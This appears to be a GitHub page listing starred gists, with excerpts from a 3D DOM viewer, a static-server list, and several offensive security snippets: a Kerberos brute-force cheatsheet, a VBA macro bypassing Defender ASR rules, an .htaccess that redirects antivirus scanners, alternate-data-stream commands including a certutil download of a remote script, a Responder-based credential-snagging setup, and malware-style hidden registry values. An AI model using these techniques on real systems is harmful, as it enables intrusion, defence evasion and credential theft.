Skip to content

Instantly share code, notes, and snippets.

View FishermansEnemy's full-sized avatar

Ian Williams FishermansEnemy

View GitHub Profile
@OrionReed
OrionReed / dom3d.js
Last active June 21, 2024 14:11
3D DOM viewer, copy-paste this into your console to visualise the DOM topographically.
// 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks.
// You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/)
(() => {
const SHOW_SIDES = false; // color sides of DOM nodes?
const COLOR_SURFACE = true; // color tops of DOM nodes?
const COLOR_RANDOM = false; // randomise color?
const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com)
const MAX_ROTATION = 180; // set to 360 to rotate all the way round
const THICKNESS = 20; // thickness of layers
const DISTANCE = 10000; // ¯\\_(ツ)_/¯
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active April 25, 2024 21:00
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@infosecn1nja
infosecn1nja / .htaccess
Created June 9, 2018 09:51 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active June 11, 2024 15:14
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@milo2012
milo2012 / gist:1c638b19b61c1338e21bad23705ff8fb
Last active December 1, 2021 11:58
Snagging creds from locked machines (for Raspberry Pi Zero)
##An update to Snagging Creds From Locked Machines from https://room362.com/post/2016/snagging-creds-from-locked-machines/.
##Installation on Rasberry Pi Zero
##Download Raspbian Jessie Lite from https://www.raspberrypi.org/downloads/raspbian/
##Use Pi Filler and write image to MicroSD
##Follow Step 1) in https://learn.adafruit.com/turning-your-raspberry-pi-zero-into-a-usb-gadget/ethernet-gadget to let the Raspberry Pi Zero device emulates as a USB NIC
$ cd /pentest
$ apt-get install -y python git python-pip python-dev screen sqlite3
$ pip install pycrypto
$ git clone https://github.com/lgandx/Responder
@KyleHanslovan
KyleHanslovan / CreateNullRegValue.py
Created June 3, 2016 15:33
Script which uses Native APIs to create a "hidden" registry value similar to Powerliks and Kovter malware.
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
@willurd
willurd / web-servers.md
Last active June 21, 2024 13:36
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000